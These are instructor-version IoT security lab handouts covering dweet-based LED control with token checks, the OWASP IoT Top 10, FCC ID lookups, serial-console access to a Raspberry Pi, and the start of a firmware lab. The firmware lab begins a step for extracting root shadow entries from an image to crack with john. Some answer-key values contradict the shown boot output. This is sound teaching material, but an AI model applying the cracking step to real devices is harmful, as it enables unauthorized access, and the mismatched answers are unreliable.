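# Assumption: a long random string that the IFTTT webhook URL carries as
# ...?text=mydweet&token=<SHARED_TOKEN>, known only to IFTTT and the Pi.
SHARED_TOKEN = "replace-with-a-long-random-secret"
MAX_AGE = timedelta(seconds=30)   # ignore dweets older than this (replay window)


def parse_created(stamp):
    """dweet.io 'created' stamps look like 2019-03-01T12:00:04.000Z (UTC)."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


class PressDetector:
    """Same polling idea as Code Cell 6, plus authentication and replay checks.

    lit is "g" or "r" (the LED currently on). drive(pin_name, on) is called to
    change a pin; the default does nothing so the logic runs without RPi.GPIO.
    """

    def __init__(self, lit, token, drive=lambda name, on: None):
        self.lit = lit
        self.token = token
        self.drive = drive
        self.last_accepted = None   # timestamp of the last dweet we acted on
        self.presses = 0

    def classify(self, dweet, now):
        """Return 'new', 'stale', 'unauthorized' or 'malformed' for one dweet."""
        try:
            created = parse_created(dweet["created"])
            token = str(dweet["content"].get("token", ""))
        except (KeyError, TypeError, ValueError, AttributeError):
            return "malformed"
        # Constant-time compare: a plain == would leak timing about the token.
        if not hmac.compare_digest(token, self.token):
            return "unauthorized"
        if self.last_accepted is not None and created <= self.last_accepted:
            return "stale"      # already handled, or a replay of an older dweet
        if now - created > MAX_AGE:
            return "stale"      # too old to be a live button press
        return "new"

    def handle(self, dweet, now):
        """Process the latest dweet; toggle the LEDs only on a verified new press."""
        verdict = self.classify(dweet, now)
        if verdict == "new":
            self.last_accepted = parse_created(dweet["created"])
            self.presses += 1
            self.lit = "r" if self.lit == "g" else "g"
            self.drive("GreenLEDPin", self.lit == "g")
            self.drive("RedLEDPin", self.lit == "r")
        return verdict


# Constructed sample dweets in dweet.io's JSON shape (not real captures).
NOW = datetime(2019, 3, 1, 12, 0, 5, tzinfo=timezone.utc)
GOOD = {"thing": "my-thing", "created": "2019-03-01T12:00:04.000Z",
        "content": {"text": "mydweet", "token": SHARED_TOKEN}}
REPLAY = dict(GOOD)                                    # same dweet seen again
FORGED = {"thing": "my-thing", "created": "2019-03-01T12:00:06.000Z",
          "content": {"text": "mydweet"}}              # posted without the token
OLD = {"thing": "my-thing", "created": "2019-03-01T11:00:00.000Z",
       "content": {"text": "mydweet", "token": SHARED_TOKEN}}


def demo():
    """Feed the samples through a detector; returns verdicts, final LED, press count."""
    det = PressDetector(lit="g", token=SHARED_TOKEN)
    verdicts = [det.handle(d, NOW) for d in (GOOD, REPLAY, FORGED, OLD)]
    return verdicts, det.lit, det.presses


if __name__ == "__main__":
    # On the Pi, replace the samples with live polling, e.g.:
    #   latest = dweepy.get_latest_dweet_for(myThing)[0]
    #   det.handle(latest, datetime.now(timezone.utc)); time.sleep(1)
    print(demo())   # → (['new', 'stale', 'unauthorized', 'stale'], 'r', 1)
```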

Part 5: Use the IFTTT app on the smartphone to trigger an event on the
Raspberry Pi
Make sure the smart phone has Internet connectivity, either by Wi-Fi or cellular data. Using cellular data will
prove that the circuit can be controlled from anywhere that has cellular data coverage.
a. Run the code cells. It is not necessary to run Code Cell 3 unless you need to verify that the circuit still
works and can be controlled from the Pi.
b. When prompted, initialize an LED when the code cell is run by selecting the color that should be lit.
c. After running the last code cell, the Raspberry Pi will be continuously monitoring the dweet.io thing in
order to detect a new button push. On your smart phone, tap the IFTTT button widget. After a brief delay,
the LED that is illuminated will change. Try this several times and observe the circuit.
Congratulations! You have created your own end-to-end IoT system.

Reflection
1. This system is not terribly exciting but can serve as a model for much more interesting IoT systems. Choose
an IoT sector and imagine a device that could be actuated by a system like this (instead of, or in addition to,
the LEDs). What are the security implications if a hacker was able to take control of the system?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. This system could serve as a metaphor, most obviously, of a home automation application
that interacts with a home IoT device such as a light switch or other device that can be turned on or off. With a
little additional imagination, the system could be seen as a wirelessly controlled medical device, power grid
switchgear, or even the flood gates on a dam.
2. Create a diagram of the system or use the one above. Label each element of the diagram with the layer of the
simplified IoT model that it belongs to.
3. What elements of this system make up its attack surface? List all the elements which are potentially
vulnerable to a cyberattack. What kinds of attacks are possible? Answer in the table below or create your own
table. Think of the system in terms of the roles of its elements. Rather than "Raspberry Pi", for example, think of
"Controller (Raspberry Pi)".

Layer           Attack Surface               Vulnerability
Device          Raspberry Pi (controller)    physical tampering, removal of SD card, disconnecting from network
Device          smart phone                  loss, unauthorized access to password-protected apps
Communication   cellular data connection     possible interception or disruption of signal
Communication   local network connection     sniffing, password interception, unauthorized device takes control of system, traffic to dweet is not encrypted
Application     web application              credential theft, manipulation of data
Application     smart phone app              unauthorized use of app

Lab – Investigating IoT Security Requirements (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will learn about IoT security requirements by investigating OWASP critical IoT security
vulnerabilities.
• Investigate OWASP.
• Investigate the OWASP IoT Top 10 Vulnerabilities.
• Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures.

Background / Scenario
In this lab, you will review a list of the top 10 IoT security vulnerabilities as documented by the Open Web
Application Security Project (OWASP). These vulnerabilities are generic weaknesses in IoT devices,
communications, or applications that can be exploited by threat actors. The vulnerabilities are directly related
to the IoT security requirements.
Instructor Note: The purpose of this lab is for students to begin thinking about how the critical security
requirements for IoT systems relate to specific vulnerabilities. The OWASP Internet of Things Project is a
valuable resource for learning about IoT security. Although some things discussed in it are beyond the scope
of this course, familiarity with the OWASP resources will help students continue in their learning about the IoT
security topic.

Required Resources
• PC with Internet access

Step 1: Investigate OWASP.


a. Visit the home page for The OWASP Foundation.
What is the purpose of the OWASP foundation?
____________________________________________________________________________________
____________________________________________________________________________________
OWASP is a foundation that is dedicated to driving visibility and evolution in the safety and security of
the world’s software.
b. Visit the OWASP Internet of Things Project page.
c. Explore the resources that are available on the page and the tabs at the top of the page to answer the
following questions.
What is the purpose of the OWASP IoT Project?
____________________________________________________________________________________
____________________________________________________________________________________
It is designed to help manufacturers, developers, and customers understand the security issues
associated with creating or purchasing IoT devices.
For what specific IoT use cases does OWASP offer recommendations?
____________________________________________________________________________________
____________________________________________________________________________________
OWASP offers guidelines for medical and manufacturing (ICS/SCADA) IoT use cases.
Look at the IoT Event Logging Project tab. Give three examples of the security events that OWASP
recommends should be logged.
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Students will not understand all of this, however, they should pick out a few things that
make sense to them, such as high rate of password attempts, traffic from unenrolled systems, device
case tampering, and device entered administrative mode. Encourage students to research and discuss
events that are new to them.

Step 2: Investigate the OWASP IoT Top 10 Vulnerabilities.


Vulnerabilities are weaknesses in IoT systems that can be exploited by threat actors in various types of
attacks. The goal of IoT security is the identification of vulnerabilities in system components before they are
selected or deployed and during the operation of the IoT system. In 2014, OWASP collected the top 10 IoT
vulnerabilities and documented how to identify and address them. Although this list is due to be
updated, it is still very useful for understanding IoT security.
a. Go to the OWASP IoT Top 10 Vulnerabilities page. Click several vulnerabilities in the list. Look at the
linked page. What information is provided for each vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Each vulnerability has a page that gives information about who might pose a threat, features of potential
attacks and the security weaknesses and impacts. In addition, there are questions that can be used to
assess system elements for the vulnerability and suggestions for addressing the vulnerability.
b. What is the first vulnerability? What needs to be checked to determine if this vulnerability is present in a
system?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
In the 2014 version of the top 10, the first vulnerability, 2014-I1 is Insecure Web Interface:
o Determine if a system has this vulnerability
o Determine if the web interface allows the username and password to be changed and if there is an
account lock out feature
o Attempt password recovery to see if account validity can be determined
What are some of the things that can be done to verify that an IoT web interface is secure?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Default passwords and usernames are required to be changed after initial setup. Password recovery
mechanisms do not verify to an attacker that a username is valid. For example, an attacker can enter a
random username at the interface and click "Forgot Password." The web frontend should require entry of
additional information, such as an email address as part of the recovery process. If the email address is
unknown to the system, then an error message is posted and the process will not continue. In addition,
passwords should be strong, account lock out should be implemented, and no passwords should be
transmitted in clear text.
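The checks this answer describes (forced change of the factory-default password, account lockout, and a password recovery flow that does not confirm to an attacker that a username is valid) can be modelled in a few lines. The following is an added example, not from the lab or from OWASP, using constructed account names, passwords and email addresses; recovery emails are recorded in a list instead of being sent.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 5          # lock the account after this many wrong passwords
PBKDF2_ROUNDS = 100_000
MIN_PASSWORD_LEN = 12
RECOVERY_ERROR = "Could not verify the account details provided."
RECOVERY_SENT = "Recovery instructions have been sent to the registered email."


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class WebInterfaceAuth:
    """In-memory model of an IoT device web interface's login and recovery logic."""

    def __init__(self):
        self.users = {}   # username -> account record
        self.sent = []    # recovery emails "sent" (recorded instead of mailed)

    def add_user(self, username, password, email, factory_default=False):
        salt = os.urandom(16)
        self.users[username] = {"salt": salt, "hash": _hash(password, salt),
                                "email": email, "failures": 0, "locked": False,
                                "must_change": factory_default}

    def login(self, username, password):
        """Return 'ok', 'change_password' (factory default still set) or 'denied'.
        Unknown user, wrong password and locked account all give the same
        'denied', so the response does not reveal which usernames exist."""
        acct = self.users.get(username)
        if acct is None or acct["locked"]:
            return "denied"
        if not hmac.compare_digest(_hash(password, acct["salt"]), acct["hash"]):
            acct["failures"] += 1
            if acct["failures"] >= MAX_FAILURES:
                acct["locked"] = True      # account lockout
            return "denied"
        acct["failures"] = 0
        return "change_password" if acct["must_change"] else "ok"

    def change_password(self, username, old_password, new_password):
        """Required before a factory-default account may be used; enforces length."""
        if self.login(username, old_password) == "denied" or len(new_password) < MIN_PASSWORD_LEN:
            return False
        acct = self.users[username]
        acct["salt"] = os.urandom(16)
        acct["hash"] = _hash(new_password, acct["salt"])
        acct["must_change"] = False
        return True

    def request_recovery(self, username, email):
        """Recovery needs the username AND the registered email. Any mismatch
        returns the identical error text, so guessing a username alone learns
        nothing about whether that account exists."""
        acct = self.users.get(username)
        if acct is None or not hmac.compare_digest(acct["email"].encode(), email.encode()):
            return ("error", RECOVERY_ERROR)
        self.sent.append(email)
        return ("sent", RECOVERY_SENT)


def build_demo():
    """Constructed sample accounts: a factory-default admin and one normal user."""
    auth = WebInterfaceAuth()
    auth.add_user("admin", "admin", "owner@example.com", factory_default=True)
    auth.add_user("alice", "correct horse battery", "alice@example.com")
    return auth
```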

Step 3: Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures


Become familiar with the features of some of the other OWASP IoT Top 10 vulnerabilities.
Work in the table below, or in your notebook using the table as a guide. Investigate the other top 10
vulnerabilities. Select three and complete the table below. List the vulnerability, some of the vulnerability
assessment questions, and some of the mitigation techniques for each.
Note: You are not expected to understand all of the information provided for each vulnerability. However, you
should understand enough to provide a few entries for at least three of them. Take time to research some of
the things that you don't currently understand, if possible.

Vulnerability                Assessment                          Mitigation

Lab – Investigate the FCC Database (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Use the Federal Communications Commission (FCC) database to view information about various IoT devices
that utilize radio frequencies for data transmission. The database has information that could benefit both the
user and a potential attacker.
Part 1: Search for Information by FCC ID
Part 2: Search for Information using the Advanced Search

Background / Scenario
IoT devices often use wireless technologies to communicate with various equipment including other IoT
devices. The FCC requires companies that develop devices that use any form of radio frequency for
transmission to register those devices and provide supporting information about the particular device. Tests
must be performed to make certain that the devices conform to the rules established by the FCC. The FCC
requires that device manufacturers visibly display their FCC ID on the device.

Required Resources
• PC or mobile device with Internet access

Part 1: Search for Information by FCC ID

Step 1: View device information by using the search feature.


a. Use the following link to access the FCC database search function:
https://www.fcc.gov/oet/ea/fccid

b. The search fields include a grantee code and a product code. The grantee code is either a 3 character or
5 character code stamped on the device. The example used here has the ID printed on the label as FCC
ID: JNZYR0019. Because the ID provided does not specify how the number is separated, attempt to put
the first 3 characters in the Grantee Code text box and the remaining characters in the Product Code
text box. Click the Search button. How many entries were displayed?
____________________________________________________________________________________
There is one entry displayed at the time this lab was written.
What is the Applicant Name that is displayed?
____________________________________________________________________________________
Logitech Far East Ltd
What other columns of information are available?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
View Form, Display Exhibits, Display Grant, Display Correspondence, Applicant Name, Address, City,
State, Country, Zip Code, FCC ID, Application Purpose, Final Action Date, Lower Frequency in MHz,
Upper Frequency in MHz.
c. Click the Summary link under the Display Exhibits column. Which Exhibit Types are marked as
Permanent Confidential?
____________________________________________________________________________________
Block Diagram, Operational Description, Schematics
d. Click the back button in your browser. Click the Detail link under the Display Exhibits column. A warning
message displays informing you that the FCC does not guarantee the documents to be virus-free. If you
have a current anti-virus application in place and have reason to trust the entity, click OK to accept the
warning. What Exhibit Types are available?
____________________________________________________________________________________
____________________________________________________________________________________
Cover Letters, External Photos, ID/Location Info, Internal Photos, Test Report, Test Setup Photos, Users
Manual
e. Click the Test Report attachment. Scroll down to page 6 to display the General Information. What is the
Product that is displayed?
____________________________________________________________________________________
2.4GHz Cordless Keyboard
What information is displayed about the Antenna Type?
____________________________________________________________________________________
PCB printed antenna with 1.41dBi antenna gain
f. Scroll to the next page. How many channels are listed in the table? ______________________________
Channels 1-12
What is the frequency range? What technologies use this frequency range?
____________________________________________________________________________________
2405-2474 MHz. Bluetooth and WiFi both use this range. This range is part of the Industrial, Scientific and
Medical (ISM) radio bands.

g. Close the Test Report attachment. Click the Internal Photos document. Scroll through the document. What
kind of photos are displayed?
____________________________________________________________________________________
A breakdown of the parts and components in the keyboard.
Is there a potential for an attack with this device? Please explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Given that the keyboard uses Bluetooth, it could be possible for an attacker to capture data transmitted. It
would also be possible for an attacker to modify the keyboard in some fashion to capture what is being typed
without the user's knowledge. This could possibly be achieved by implanting some kind of recording
device that makes use of the SPI_MOSI and SPI_MISO pins inside the keyboard. This keyboard could be
used on many types of IoT devices.

Step 2: Search for information on a second device


a. Return to the FCC ID search screen. Enter the FCC ID: A3L-WIS09ABGN2. You may need to get creative
on the entry in order to retrieve the information. Attempt to use the 3 or 5 character code. Pay attention to
the message following the Product Code prompt. How many entries were returned? (Hint: Hyphen (-) is
significant.)
____________________________________________________________________________________
____________________________________________________________________________________
There were 10 displayed at the time this lab was written.
b. Select one of the entries dated 8/20/2009. Click the Detail link. Click the link for Test Report 1. What is
the equipment type? What is the model number and who is the applicant?
____________________________________________________________________________________
____________________________________________________________________________________
Equipment: Wireless LAN adapter, model: WIS09ABGN2, Applicant: Samsung Electronics
c. Scroll to Section 2 General Information. Based on the information in the Product Details and Table for
Filed Antenna, which wireless standards are supported?
____________________________________________________________________________________
____________________________________________________________________________________
802.11a, 802.11b, 802.11g, 802.11n
d. Close the Test Report 1 document. Open the Internal Photos document. Scroll down to page C8 of C9.
What chip is displayed? Why might this information be useful?
____________________________________________________________________________________
RaLink RT3572L, it could be beneficial in locating a driver.

Part 2: Search for Information using the Advanced Search


It is possible to search for devices within the FCC database without knowing the FCC ID. This part of the lab
will offer some advice on narrowing the search pattern for more precise results.

Step 1: Search for a device without the FCC ID


In this search you will see what information is available for a Nest thermostat prior to purchasing one.
Return to the FCC ID search form. Click the Advanced Search button at the upper right of the dialog.
a. In the Applicant Name text box type Nest and then click Start Search near the bottom of the form. How
many items were returned?
____________________________________________________________________________________
There were 134 items at the time this lab was written.
b. With the large number of entries that were returned, it would be best to provide a few more parameters.
Return to the previous search screen by clicking the back button in your browser. Add the following
search parameters:
1) Final Action Date Range (mm/dd/yyyy) 09/01/2016 to 04/30/2018
2) Application Purpose: Original Grant
3) Product Description: thermostat
How many items were returned?
____________________________________________________________________________________
There were 7 items returned at the time this lab was written.
Select Details on any of the entries. How many documents are displayed for the thermostat?
____________________________________________________________________________________
There were 12 documents returned at the time this lab was written.
Why are there multiple test reports?
____________________________________________________________________________________
____________________________________________________________________________________
The thermostat is capable of communicating using multiple protocols. The protocols tested are WLAN
(WiFi), BLE (Bluetooth Low Energy), and Zigbee.

Reflection
1. How could the information available in the FCC database be valuable when attempting to secure IoT devices?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The primary areas to note would be the potential schematics and communication protocols.
2. How could the information available in the FCC database be valuable to an IoT attacker?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. Using the same information, we are attempting to secure areas that attackers are trying to
exploit.
Lab - Compromise IoT Device Hardware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Raspberry Pi Pinout Diagram

Objectives
Perform threat modeling activities to evaluate IoT device hardware and firmware.
Part 1: Accessing the Raspberry Pi with Serial Interface
Part 2: Disabling Serial Login Access to Raspberry Pi

Background / Scenario
This lab will demonstrate how an IoT device may be compromised by physically connecting to the device
using communication protocols other than Ethernet. A Raspberry Pi could be used for controlling and
monitoring many types of equipment. It is important that security is in place at the forefront when configuring
and positioning these types of devices. The last part of the lab demonstrates how to secure against these
compromises.
The lab makes use of a variant of the RS-232 serial communication standard, which has been used since the
1960s to communicate between various types of equipment.
Please note that a special cable is used to connect the Raspberry Pi to the PC serial port. Even though
some PCs still have conventional RS-232 COM ports, it is imperative that the pins of those ports are never
connected directly to the Raspberry Pi. The Raspberry Pi uses +3.3v for the serial pins, whereas the
RS-232 specification allows voltages up to +13v.
There are other possible methods for reducing the voltage, but given the header connections on the Raspberry Pi
and many other IoT-type devices, this cable provides the simplest way to accomplish serial connectivity.

Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM and terminal emulation software, such as PuTTY
• Network connectivity between PC and Raspberry Pi
• adafruit - USB TO TTL SERIAL CABLE - DEBUG / CONSOLE CABLE FOR RASPBERRY PI or
compatible cable – adafruit PRODUCT ID: 954 (similar to the one pictured below)

Note: When purchasing a compatible cable look for those using either the Prolific or SiLabs Chipset. Make
certain to read the reviews when purchasing a compatible cable to verify compatibility with the Raspberry Pi.
It is important that the output voltage be +3.3v.

Part 1: Accessing the Raspberry Pi with the Serial Interface


This part of the lab will create a TTY connection to the Raspberry Pi using a USB to Serial Cable connected
to the serial pins on the Raspberry Pi header.

Step 1: Set up the topology.


a. Start the IoT Security lab topology with Kali VM and Raspberry Pi connected physically via an Ethernet
cable.
b. Log into Kali VM to start the DHCP server.
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
c. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.
d. Using the pinout diagram above, or the diagram at https://pinout.xyz, locate the Raspberry Pi pins
listed in the following table.

USB to Serial Wire    Raspberry Pi Pin
Black                 6 - Ground
White                 8 - Transmit
Green                 10 - Receive
Red                   Unused

e. After locating the necessary pins, power off the Raspberry Pi until instructed to power it up again.
(pl-app) root@myPi:/home/pi/notebooks# shutdown -h now
f. Unplug the Raspberry Pi from the power source. With the Raspberry Pi turned off, connect the USB to
Serial Cable to the pins listed in the above table on Raspberry Pi.

Step 2: Configure software – Windows (skip this step if using Linux)


a. Install the driver for the adafruit USB to TTL Serial Cable as documented at
https://www.adafruit.com/product/954 for the cable from adafruit and follow the directions provided by the
vendor.
b. When complete, plug in the USB to TTL Serial Cable to a USB port on the PC.

c. Navigate to the Device Manager to determine the COM port assigned to the USB to Serial connection. In
this example, Prolific USB-to-Serial is using COM3.

d. The following settings will need to be defined for connecting to the Raspberry Pi using the console port.

Description     Settings
Port            COM port used as indicated in Device Manager
Baud Rate       115200
Data bits       8
Stop bits       1
Parity          None
Flow control    None

For example, in the PuTTY Session screen, select the Serial radio button, make sure the COM port in the
Serial line box matches the COM port determined in Device Manager, and make sure the correct baud rate
is specified.

Expand Connection and click Serial to verify all the options are configured according to the above table.
Click Open to start the terminal session to the Raspberry Pi. PuTTY is waiting for output from the
Raspberry Pi or input from the keyboard.

e. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7),
cr=00c5387d

<Some output omitted>

Welcome to the Chestnut Platform!
Version: 2.1

IP: 203.0.113.11

myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 4.14.30+
What type of processor is being used?
____________________________________________________________________________________
CPU: ARMv7 Processor +
f. Log in using the credentials for the user pi configured for your Raspberry Pi in a previous lab.

Step 3: Configure software – Linux (skip this step if using Windows)


a. On a Linux platform (your host PC) determine the port to use by listing the tty ports in the /dev folder.
user@computer ~ $ ls /dev/ttyUSB*
b. Assuming the USB tty port is USB0, access the USB to Serial connection by typing the following:
user@computer ~ $ screen /dev/ttyUSB0 115200
c. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7),
cr=00c5387d

<Some output omitted>


Welcome to the Chestnut Platform!
Version: 2.1

IP: 203.0.113.11

myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 3.18.11-v7+

What type of processor is being used?
____________________________________________________________________________________
CPU: ARMv7 Processor +
d. Login to the Raspberry Pi using the user pi and password configured for your Raspberry Pi.

Part 2: Disabling Serial Login Access to Raspberry Pi


If the Raspberry Pi is intended to be collecting sensitive information, and there is any possibility of physical
access to the device, it is probably best to disable login access through the serial line.

Step 1: Connect to the Raspberry Pi through the console


It will be necessary to get a console connection to the Pi either through a direct cable connection or through
the PL-App console. Log in using the credentials for the user pi as defined for your particular device.
a. After the connection is established, modify the Raspberry Pi configuration using the following command:
pi@myPi$ sudo raspi-config
b. Depending on your Raspberry Pi version, select Interfacing Options -> Serial and press Enter or select
Advanced Options -> Serial and press Enter.
c. Select <No> for the question "Would you like a login shell to be accessible over serial?" and press Enter.
d. Select <Yes> for the question "Would you like the serial port hardware to be enabled?" and press Enter.
e. On the next screen, verify that the login shell is disabled and serial interface is enabled. Press <OK> to
continue.
f. Select <Finish> to exit the configuration window.
g. Reboot the Raspberry Pi when prompted. If not, enter the command sudo reboot at the prompt to reboot
the Raspberry Pi. Then watch the output in the terminal application window.
$ sudo reboot
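Added check (not part of the lab): a script that audits the two files raspi-config edits when you make the choices in steps c and d, /boot/cmdline.txt (a console= entry naming the serial device is what gives a login shell on the pins) and /boot/config.txt (enable_uart=1 keeps the UART hardware on). The file names and that raspi-config behaviour are assumptions taken from the standard Raspberry Pi OS layout; the sample file contents below are constructed.

```python
#!/usr/bin/env python3
"""Audit a Raspberry Pi's boot configuration for the state Part 2 aims for:
no login shell over the serial line, UART hardware still enabled.

Assumed (not from the lab): raspi-config records the serial choices in
/boot/cmdline.txt (console=...) and /boot/config.txt (enable_uart=...).
"""
import re

# Device names the Pi's UARTs can appear under in a console= entry
SERIAL_CONSOLES = {"serial0", "serial1", "ttyAMA0", "ttyS0"}

# Constructed samples: cmdline.txt before and after step c, plus a config.txt
SAMPLE_CMDLINE_BEFORE = ("dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 "
                         "root=/dev/mmcblk0p2 rootfstype=ext4 rootwait")
SAMPLE_CMDLINE_AFTER = ("dwc_otg.lpm_enable=0 console=tty1 "
                        "root=/dev/mmcblk0p2 rootfstype=ext4 rootwait")
SAMPLE_CONFIG_TXT = "# Enable audio\ndtparam=audio=on\nenable_uart=1\n"


def serial_consoles(cmdline):
    """Return the serial devices named by console= entries in cmdline.txt.

    cmdline.txt is one line of space separated key=value tokens; a token such
    as console=serial0,115200 is what starts a getty on the serial pins.
    """
    found = []
    for token in cmdline.split():
        if not token.startswith("console="):
            continue
        device = token[len("console="):].split(",", 1)[0]
        if device in SERIAL_CONSOLES:
            found.append(device)
    return found


def uart_enabled(config_txt):
    """True if the last uncommented enable_uart setting in config.txt is 1."""
    state = False
    for line in config_txt.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        m = re.match(r"enable_uart\s*=\s*(\d)", line)
        if m:
            state = m.group(1) == "1"
    return state


def audit(cmdline, config_txt):
    """Summarise the serial exposure the way step e of the lab describes it."""
    consoles = serial_consoles(cmdline)
    hardware = uart_enabled(config_txt)
    return {
        "login_shell_over_serial": bool(consoles),
        "serial_hardware_enabled": hardware,
        "hardened": not consoles and hardware,
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # e.g. python3 serial_audit.py /boot/cmdline.txt /boot/config.txt
        with open(sys.argv[1]) as f, open(sys.argv[2]) as g:
            print(audit(f.read(), g.read()))
    else:
        print("before:", audit(SAMPLE_CMDLINE_BEFORE, SAMPLE_CONFIG_TXT))
        print("after: ", audit(SAMPLE_CMDLINE_AFTER, SAMPLE_CONFIG_TXT))
```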

Step 2: Attempt to reconnect with the serial connection


a. After the rebooting process is finished, the Raspberry Pi should no longer display a command prompt in
the terminal application. This port may now be used to communicate with other devices for data
collection. If there are any connections to the serial port, it is important that they be protected because
anyone with the appropriate cable could connect to the device and exfiltrate data.
b. In the Kali VM or the host PC, navigate to the web page of the terminal window of the PL-App for your
Raspberry Pi.
c. To simulate data being transmitted from the IoT device, create a Python script by pasting the following at
the prompt at the terminal of the PL-App.
Enter the command cat > comout.py at the prompt.
(pl-app) root@myPi:/home/pi/notebooks# cat > comout.py
At the cursor, paste the following script:
#!/usr/bin/env python

import time
import serial

# Open the Pi's primary UART (/dev/serial0) with the same 115200 8N1
# settings the terminal emulator on the PC is using
ser = serial.Serial(
    port='/dev/serial0',
    baudrate=115200,
    parity=serial.PARITY_NONE,
    stopbits=serial.STOPBITS_ONE,
    bytesize=serial.EIGHTBITS,
    timeout=1
)

# Send nine numbered lines, pausing two seconds between each one
for counter in range(9):
    ser.write(b'Write counter: %d \r\n' % (counter))
    time.sleep(2)

ser.close()
d. After pasting the script into the terminal window, press CTRL-D to close the file.
e. Issue the command python comout.py at the prompt.
(pl-app) root@myPi:/home/pi/notebooks# python comout.py
f. Navigate to the terminal application (PuTTY).
Notice how the output can be read on the terminal. The terminal pauses 2 seconds between each time
output is written to the screen as instructed in the Python script.

Reflection
1. Knowing what you know so far, do you think it would be possible to connect two Raspberry Pi devices
together using the serial pins? If so, how?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
It would be very easy to do. Simply use a jumper wire connecting the Tx pin on Raspberry Pi #1 to the Rx pin
on Raspberry Pi #2 and the Rx pin on Raspberry Pi #1 to the Tx pin on Raspberry Pi #2. Because both
devices are using +3.3v, there would be no other conversion necessary. Both Raspberry Pi devices could
have their serial ports disabled for login and the terminal emulation software set to the same baud rate in
order to communicate. It may be necessary to download the ‘screen’ application using ‘apt-get install screen’
on the Raspberry Pi. It would also be possible to leave the serial login enabled on Raspberry Pi #1 and
connect to it from Raspberry Pi #2 using the ‘screen’ application and logging in.
2. What kind of information might you need to know in order to capture the data coming out of the serial port of
an IoT device?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
In order to capture data, it would be necessary to know the baud rate, stop bits, parity, and flow control
settings on the IoT device. The baud rate could be determined through trial and error using the common baud
rates (i.e., 2400, 4800, 9600, 19200, … 115200).
Lab – Compromise IoT Device Firmware (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Performing Threat Modeling Activities to Evaluate IoT Device Firmware
Part 2: Reflection and Discussion of Threats to IoT Device Firmware

Background / Scenario
IoT devices are susceptible to attacks like many other Internet connected devices running an operating
system. In the past, hackers have taken over smart home devices including security cameras, refrigerators,
ovens, air conditioners, and even vehicles while they were driving. IoT devices with cameras can potentially
be used as spying devices within one’s home. Many popular IoT devices run Linux as their OS.
Vulnerabilities with device firmware include, but are not limited to: key handling vulnerabilities, hard coded
passwords, default username/passwords, clear text password transmission through WiFi, buffer overflow
attacks, distributed denial of service attacks, and firmware modification attacks.
This lab will require students to download a device firmware binary file and decompress/decode it to its file
system and kernel components. Students will be required to analyze the firmware and investigate how
vulnerabilities can be exploited.
In this particular lab, we will be exploring an IoT device’s firmware file by using a wide variety of
tools/commands on a Kali Linux virtual image.

Required Resources
• Laptop or PC running Oracle Virtual Box with a virtual image of Kali Linux loaded
• Internet connection

Part 1: Performing Threat Modeling Activities to Evaluate IoT Device Firmware

Step 1: Set up the environment and open a terminal window.


a. Start the IoTSec Kali VM and log in using username root and password toor.

Note: If the Kali Linux machine has not been installed, please refer to a previous lab in this course.
b. Open up a terminal window.

Step 2: Crack root password using john.


a. Issue the strings command on the rootfs.ext2 file system and search for “root” to see if there are any
password entries. This file is essentially an image file that could be written directly to a drive and booted
up using the appropriate hardware. We will look for “root:$”, which is how a typical entry would appear in
the shadow file, and then save it to a temporary file in the /tmp directory. However, when we filter for
“root:$” using the ‘grep’ command, we have to escape the “$” with two backslashes (\\) because $ has
a special meaning both to the shell and, as an end-of-line anchor, to grep.

Note: The Linux prompts in the examples of this lab have been shortened to just #, indicating that you
have root access.
# pwd
